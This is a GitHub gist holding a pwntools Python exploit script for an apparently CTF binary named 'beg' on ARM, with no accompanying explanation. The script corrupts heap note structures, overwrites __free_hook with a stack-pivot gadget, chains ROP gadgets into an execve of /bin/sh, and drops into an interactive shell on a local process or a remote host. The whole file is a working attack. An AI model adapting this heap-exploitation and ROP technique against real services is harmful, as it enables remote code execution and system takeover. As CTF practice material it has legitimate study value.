Created
March 24, 2018 18:45
-
-
Save grimmlin/dc3a8ee1ba95cf7634fb5e447481c07f to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python2 | |
| # encoding: utf-8 | |
| from pwn import * | |
| import sys | |
| import ctypes | |
| from time import sleep | |
| LOCAL = "remote" not in sys.argv | |
| BINARY = "beg" | |
| elf = ELF(BINARY) | |
| context.log_level = "debug" if "debug" in sys.argv else "info" | |
| #context.terminal = ['urxvt', '-geometry', '160x60', '-e', 'sh', '-c'] | |
| context.terminal = ['tmux', 'splitw', '-h', '-l', '120'] | |
| context.update(binary=elf) | |
| #libc = ELF("libc.so") | |
| #rop = ROP(libc) | |
| #binsh = next(libc.search("/bin/sh")) | |
| if LOCAL: | |
| r = process(BINARY) | |
| else: | |
| r = remote("10.13.37.68", 1234) | |
| dopivot = 0x17e0c | |
| # ^ this is in non-thumb : ldmib r0!, {r3, r4, r5, r6, r7, r8, r9, sl, ip, sp, lr, pc} | |
| free_hook = 0x7c510 | |
| free_ptr = free_hook-8 | |
| name_addr = 0x7c804 | |
| svc = 0x22134 + 1 # in thumb | |
| fakebug = p32(10) + "/bin/sh\x00" + p32(name_addr+5*4) + p32(free_ptr) | |
| fakebug += p32(name_addr+7*4)+p32(0)+p32(0x616263)+ p32(name_addr+4)+p32(0)*2+"dddd"+p32(svc) | |
| print r.readuntil(": ") | |
| r.sendline(fakebug) | |
| r.sendlineafter("title : ", "test") | |
| r.sendlineafter("requested : ", "123") | |
| r.sendlineafter("ion) : ", "test") | |
| r.readuntil("> ") | |
| for x in range(4): | |
| r.sendline("3") | |
| r.sendlineafter("id : ", "1") | |
| r.sendlineafter("message : ", "Please Sir") | |
| r.sendline("3") | |
| r.sendlineafter("id : ", "1") | |
| # Now last note points to our fake structure (name) | |
| r.sendlineafter("message : ", "Please Siraa"+p32(name_addr+5*4)+p32(name_addr)) | |
| print r.readuntil("> ") | |
| log.info(" pointing to __free_hook ") | |
| r.sendline("1") | |
| r.sendlineafter("title : ", "junk") | |
| r.sendlineafter("requested : ", str("1234")) | |
| r.sendlineafter(") : ", "junk") | |
| #Let's trash __free_hook with our money value : | |
| log.info(" overwriting __free_hook ") | |
| r.readuntil("> ") | |
| r.sendline("1") | |
| r.sendlineafter("title : ", "yolo") | |
| r.sendlineafter("requested : ", str(dopivot)) | |
| r.sendlineafter(") : ", "yolo") | |
| r.readuntil("> ") | |
| r.sendline("3") | |
| r.sendlineafter("id : ", "1") | |
| newsp = name_addr+8*4 | |
| popreg2 = 0x10144+1 | |
| popregs = p32(0xaaaaaaaa)+p32(0xbbbbbbbb)+p32(0xb)+"eeeeffffgggghhhh"+p32(newsp)+"jjjj"+p32(popreg2) | |
| log.info(" triggering free ") | |
| r.sendlineafter("message : ", "Please Siraa"+popregs) | |
| log.info('Getting shell...') | |
| #r.sendline("cat flag*;") | |
| r.interactive() | |
| r.close() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment